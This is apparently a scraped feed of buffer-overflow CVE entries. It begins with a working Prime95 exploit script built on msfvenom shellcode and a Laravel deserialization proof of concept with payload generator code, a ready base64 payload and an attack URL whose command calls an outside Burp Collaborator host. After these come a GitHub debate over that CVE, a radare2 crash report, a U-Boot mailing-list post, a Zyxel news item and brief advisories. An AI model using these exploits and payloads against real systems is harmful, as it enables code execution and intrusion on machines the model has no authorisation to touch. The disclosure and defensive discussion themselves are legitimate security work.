Prime95 30.7 build 9 suffers from a Buffer Overflow vulnerability that could lead to Remote Code Execution.

    # Exploit Title:   Prime95 Version 30.7 build 9 Buffer Overflow RCE# Discovered by: Yehia Elghaly# Discovered Date: 2022-04-25# Vendor Homepage: https://www.mersenne.org/# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip# Tested Version: 30.7 build 9# Vulnerability Type:  Buffer Overflow (RCE) Local# Tested on OS: Windows 7 Professional x86# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE# 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will openbuffer = "A" * 144jum = "\xd8\x29\xe7\x6e" #push esp # ret  |  {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)nop = "\x90" * 20 #Nob hot = "C" * 100#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payloadpayload =  b""payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"payload += b"\xc7\x33\x80\xb2"evil = buffer + jum + nop + payloadfile = open('PExploit.txt','w+')file.write(evil)file.close()

CVE-2022-30055: Prime95 30.7 Build 9 Buffer Overflow ≈ Packet Storm

Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in __destruct in Illuminate\Broadcasting\PendingBroadcast.php and dispatch($command) in Illuminate\Bus\QueueingDispatcher.php.

> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30778

**Build a route to test:**

routes/web.php ：

<?php

use Illuminate\\Support\\Facades\\Route;

/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route::get('/', function (\\Illuminate\\Http\\Request $request) {
//    return view('welcome');
    $ser = base64\_decode($request\->input("ser"));
    unserialize($ser);
    return "ok";
});

**poc**

<?php
namespace Illuminate\\Contracts\\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = \[\];
        protected $handlers = \[\];
        protected $queueResolver;
        function \_\_construct()
        {
            $this\->queueResolver = "system";

        }
    }
}

namespace Illuminate\\Broadcasting{

    use Illuminate\\Contracts\\Queue\\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function \_\_construct()
        {

        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function \_\_construct()
        {
            $this\->event = new BroadcastEvent();
            $this\->event\->connection = "ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net";
            $this\->events = new \\Illuminate\\Bus\\Dispatcher();
        }
    }
}
namespace{
    $a = new \\Illuminate\\Broadcasting\\PendingBroadcast();
    echo base64\_encode(serialize($a));
}

result :

    Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=
    

**attack**

http://127.0.0.1:1080/?ser=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=

So, why was a CVE issued for this?

I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?

> I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?

@caendesilva If successfully exploited, an attacker would be able to perform remote code execution. In the example above this is demonstrated by running the ping command, which is a harmless way to confirm.

A malicious attacker could execute any command. This could be used to spawn a reverse shell, read and write files, access .env credentials, pivot to the database, etc.

Successful exploitation would require the use of unserialize within your laravel application and passing untrusted user input to that. While not recommended, it's also not unheard of.

> > I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?
> 
> @caendesilva If successfully exploited, an attacker would be able to perform remote code execution. In the example above this is demonstrated by running the ping command, which is a harmless way to confirm.
> 
> A malicious attacker could execute any command. This could be used to spawn a reverse shell, read and write files, access .env credentials, pivot to the database, etc.
> 
> Successful exploitation would require the use of unserialize within your laravel application and passing untrusted user input to that. While not recommended, it's also not unheard of.

Thank you so much for the explanation. What confused me is that the ping command is entered from within your backend code. Are you claiming that the following string ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net can be entered and then executed by an attacker through the example route?

Are you aware of any instances in "official" (as in code maintained by the Laravel org) codebases where this is used? From your reply I know that my codebase does not contain this vulnerability, but if it is present in say Laravel Jetstream, that's something that should be noted.

The main problem I see is that a POP chain is NEVER a vulnerability by itself. The vulnerability would be to call unserialiase() to deserialise unvalidated input. But this instance doesn't appear in the code, hence it should not even be considered valid for a CVE.

It's really a nice finding tho. Just doesn't make sense to have it as a CVE, because... it's not a vulnerability.

> Are you claiming that the following string ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net can be entered and then executed by an attacker through the example route?

That is correct, by using the PoC to generate a base64 payload we can pass that to the example route. I have not personally reviewed all the laravel maintained codebases, but anywhere unserialize accepts user controlled input would be vulnerable.

> The main problem I see is that a POP chain is NEVER a vulnerability by itself. The vulnerability would be to call unserialiase() to deserialise unvalidated input. But this instance doesn't appear in the code, hence it should not even be considered valid for a CVE.
> 
> It's really a nice finding tho. Just doesn't make sense to have it as a CVE, because... it's not a vulnerability.

So having code execution on unserialize is a feature ?

> So having code execution on unserialize is a feature ?

The official PHP docs warn of this.  

This also reflects Taylor Otwell's response when I asked if he was aware of this CVE.

> On Tuesday, May 17th, 2022 at 12:06, taylorotwell taylor@laravel.com wrote:
> 
> Passing unsanitized user input to unserialize is never safe in PHP.

Of note: Snyk points to this being the vulnerable code in question.

> Affected versions of this package are vulnerable to Deserialization of Untrusted Data via an unserialize pop chain in \_\_destruct and dispatch($command).

@pasterp If you deserialise untrusted data, it's your fault for doing that. If there is whatever POP chain in your code, you may allow an attacker to execute arbitrary code, but the POP chain just makes the vulnerability worse, it DOES NOT constitute the vulnerability.

To make an example, if you have a stack buffer overflow, you can exploit it with a ROP chain, but the vulnerability is not the ROP chain, it is the bloody stack buffer overflow.  
Saying that the POP chain is the vulnerability is like saying that the ROP chain is the vulnerability, and that's false.

Calling unserialise on untrusted data is a vulnerability.

Copy link

** **pqlx** commented May 17, 2022 •**

I think there should be some serious thought about revoking this CVE.

As pointed out, there is no security boundary being breached here. Passing arbitrary data to unserialize has always been classified as "unsafe". That the Laravel core framework just happens to have a few classes that you could readily use in such a scenario does not constitute a vulnerability on their part.

Besides, there's no real fix for people using unserialize inappropriately anyway. As @klezVirus points out, it's analogous to something like ROP gadgets. (Framework) developers can keep patching their classes to not do stuff in e.g. __construct or __destruct, but besides making code more complex (and maybe eliminating low-hanging fruit), there are always going to be more complex chains that give the attacker more control. It is a fundamental issue with unserialize.

> So having code execution on unserialize is a feature ?

No it's not. But it's not necessarily a vulnerability either. If someone were to pass unsafe user input into an exec() call, that would be a vulnerability in that persons code, but it's not a vulnerability within PHP.

If there are any usages in the Laravel core framework that actually has code akin to this, then yeah it should be a CVE. But since it does not seem to be so, this is not any more of a vulnerability in Laravel as the following is:

// Obviously DON'T actually do this in a real app
Route::get('/', function (\\Illuminate\\Http\\Request $request) {
    echo shell\_exec($request\->input('name'));
});

While my example above for sure is a vulnerability in my code (if it was actually deployed), it's not a vulnerability within Laravel, or even PHP.

@caendesilva I'd argue comparing exec to unserialize is an apples to oranges comparison and not really the best analogy for what is happening here.

While I agree it's not best practice to pass untrusted user input to unserialize, doing that alone does not automatically create a path for exploitation.

So just to clarify as we also got the snyk alert. The vulnerability here is that there exists a class in Laravel which will do code execution when called, but that the only route to call it is via unserialize which is not passed untrusted user input in laravel itself. So it isn't reachable unless a user (developer) calls unserialize() on untrusted input which is bad idea anyway (according to the docs and common sense).

I'm here too because of snyk. Is there any solution to this?

> I'm here too because of snyk. Is there any solution to this?

@oreillysean Check your code for any areas that might use unserialize and accept user input. If none are found you can mark it as ignored in Synk since it's not applicable to you.

this is for Laravel 9.1.8 only ?  
if yes, Snyk raised a false alert for my 8.83.12 Laravel ?

> @GlitchWitch yes I agree with you. However would this not fix the issue as stated in the CVE oreillysean/framework@57c5f57

I haven't had a chance to test, but perhaps it would be worth submitting your proposed fix as a PR for the Laravel team to review.

CVE-2022-30778: Laravel 9.1.8 POP chain · Issue #1 · 1nhann/vulns

nfs_lookup_reply in net/nfs.c in Das U-Boot through 2022.04 (and through 2022.07-rc2) has an unbounded memcpy with a failed length check, leading to a buffer overflow. NOTE: this issue exists because of an incorrect fix for CVE-2019-14196.

**zi0Black** zi0Black at protonmail.com  
_Wed May 11 22:25:37 CEST 2022_

*   Previous message (by thread): \[PATCH 7/8\] powerpc: mpc85xx: Set TEXT\_BASE addresses to real base values
*   Next message (by thread): Ineffective fix of CVE-2019-14196
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

Hi to every one,

The current fix for the vulnerability identified via CVE-2019-14196 is not effective and a buffer overflow is still possible. Please refer to my comment posted on the commit (5d14ee4e53a81055d34ba280cb8fd90330f22a96) on github.

https://github.com/u-boot/u-boot/commit/5d14ee4e53a81055d34ba280cb8fd90330f22a96

Regards,

zi0Black
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 509 bytes
Desc: OpenPGP digital signature
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20220511/3a9389bc/attachment.sig\>

*   Previous message (by thread): \[PATCH 7/8\] powerpc: mpc85xx: Set TEXT\_BASE addresses to real base values
*   Next message (by thread): Ineffective fix of CVE-2019-14196
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the U-Boot mailing list

CVE-2022-30767: Ineffective fix of CVE-2019-14196

A buffer overflow vulnerability in the SonicWall SSL-VPN NetExtender Windows Client (32 and 64 bit) in 10.2.322 and earlier versions, allows an attacker to potentially execute arbitrary code in the host windows operating system.

CVE-2022-22281

Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.7.0. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

**Description**

Heap-based Buffer Overflow in msp430\_op

**Environment**

    radare2 5.6.9 0 @ linux-x86-64 git.
    commit: 5.6.9 build: 2022-05-01__12:17:49
    

**Build**

    export CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan"
    ./configure && make
    

**POC**

    radare2 -q -A ./poc6
    

poc6

**Asan**

    =================================================================
    ==4030479==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000595d3 at pc 0x7f2b12c8cfa6 bp 0x7ffdf5b699b0 sp 0x7ffdf5b699a0
    READ of size 1 at 0x6020000595d3 thread T0
        #0 0x7f2b12c8cfa5 in r_read_le16 /home/ubuntu/radare2-master/libr/include/r_endian.h:143
        #1 0x7f2b12c8cfa5 in r_read_at_le16 /home/ubuntu/radare2-master/libr/include/r_endian.h:151
        #2 0x7f2b12c8cfa5 in msp430_op /home/ubuntu/radare2-master/libr/..//libr/anal/p/anal_msp430.c:60
        #3 0x7f2b12de2d19 in r_anal_op /home/ubuntu/radare2-master/libr/anal/op.c:121
        #4 0x7f2b14f241df in anal_block_cb /home/ubuntu/radare2-master/libr/core/canal.c:3497
        #5 0x7f2b12e267e8 in r_anal_block_recurse_depth_first /home/ubuntu/radare2-master/libr/anal/block.c:562
        #6 0x7f2b14f565fd in r_core_recover_vars /home/ubuntu/radare2-master/libr/core/canal.c:3548
        #7 0x7f2b14bcd43f in r_core_af /home/ubuntu/radare2-master/libr/core/cmd_anal.c:3926
        #8 0x7f2b14f5e320 in r_core_anal_all /home/ubuntu/radare2-master/libr/core/canal.c:4247
        #9 0x7f2b14cac9e6 in cmd_anal_all /home/ubuntu/radare2-master/libr/core/cmd_anal.c:11219
        #10 0x7f2b14d1aadc in cmd_anal /home/ubuntu/radare2-master/libr/core/cmd_anal.c:12436
        #11 0x7f2b14c08d2c in r_core_cmd_subst_i /home/ubuntu/radare2-master/libr/core/cmd.c:4490
        #12 0x7f2b14c08d2c in r_core_cmd_subst /home/ubuntu/radare2-master/libr/core/cmd.c:3363
        #13 0x7f2b14c1682a in run_cmd_depth /home/ubuntu/radare2-master/libr/core/cmd.c:5384
        #14 0x7f2b14c1682a in r_core_cmd /home/ubuntu/radare2-master/libr/core/cmd.c:5467
        #15 0x7f2b14c1682a in r_core_cmd /home/ubuntu/radare2-master/libr/core/cmd.c:5398
        #16 0x7f2b17aee546 in r_main_radare2 /home/ubuntu/radare2-master/libr/main/radare2.c:1419
        #17 0x7f2b178900b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #18 0x564ce9a25b6d in _start (/home/ubuntu/radare2-master/binr/radare2/radare2+0x9b6d)
    
    0x6020000595d3 is located 1 bytes to the right of 2-byte region [0x6020000595d0,0x6020000595d2)
    allocated by thread T0 here:
        #0 0x564ce9b10bb8 in __interceptor_malloc (/home/ubuntu/radare2-master/binr/radare2/radare2+0xf4bb8)
        #1 0x7f2b14f23c9b in anal_block_cb /home/ubuntu/radare2-master/libr/core/canal.c:3447
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/radare2-master/libr/include/r_endian.h:143 in r_read_le16
    Shadow bytes around the buggy address:
      0x0c0480003260: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c0480003270: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c0480003280: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c0480003290: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c04800032a0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
    =>0x0c04800032b0: fa fa fd fa fa fa fd fa fa fa[02]fa fa fa fa fa
      0x0c04800032c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c04800032d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c04800032e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c04800032f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0480003300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4030479==ABORTING
    

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

CVE-2022-1714: Heap-based Buffer Overflow in radare2

Buffer Overflow vulnerability in B&R Automation Runtime webserver allows an unauthenticated network-based attacker to stop the cyclic program on the device and cause a denial of service.

CVE-2021-22275

**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

101.0.1210.47

5/13/2022

101.0.4951.64

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220509**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220509)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-1638: Chromium: CVE-2022-1638 Heap buffer overflow in V8 Internationalization

Zyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution.
"A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device," the company said in an advisory

Zyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution.

"A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device," the company said in an advisory published Thursday.

Cybersecurity firm Rapid7, which discovered and reported the flaw on April 13, 2022, said that the weakness could permit a remote unauthenticated adversary to execute code as the "nobody" user on impacted appliances.

Tracked as CVE-2022-30525 (CVSS score: 9.8), the flaw impacts the following products, with patches released in version ZLD V5.30 -

*   USG FLEX 100(W), 200, 500, 700
*   USG FLEX 50(W) / USG20(W)-VPN
*   ATP series, and
*   VPN series

Rapid 7 noted that there are at least 16,213 vulnerable Zyxel devices exposed to the internet, making it a lucrative attack vector for threat actors to stage potential exploitation attempts.

The cybersecurity firm also pointed out that Zyxel silently issued fixes to address the issue on April 28, 2022 without publishing an associated Common Vulnerabilities and Exposures (CVE) identifier or a security advisory. Zyxel, in its alert, blamed this on a "miscommunication during the disclosure coordination process."

"Silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues," Rapid7 researcher Jake Baines said.

The advisory comes as Zyxel addressed three different issues, including a command injection (CVE-2022-26413), a buffer overflow (CVE-2022-26414), and a local privilege escalation (CVE-2022-0556) flaw, in its VMG3312-T20A wireless router and AP Configurator that could lead to arbitrary code execution.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability

This advisory contains mitigations for Stack-based Buffer Overflow, and Out-of-bounds Read vulnerabilities in the Delta Electronics CNCSoft software management platform.

Tag

#buffer_overflow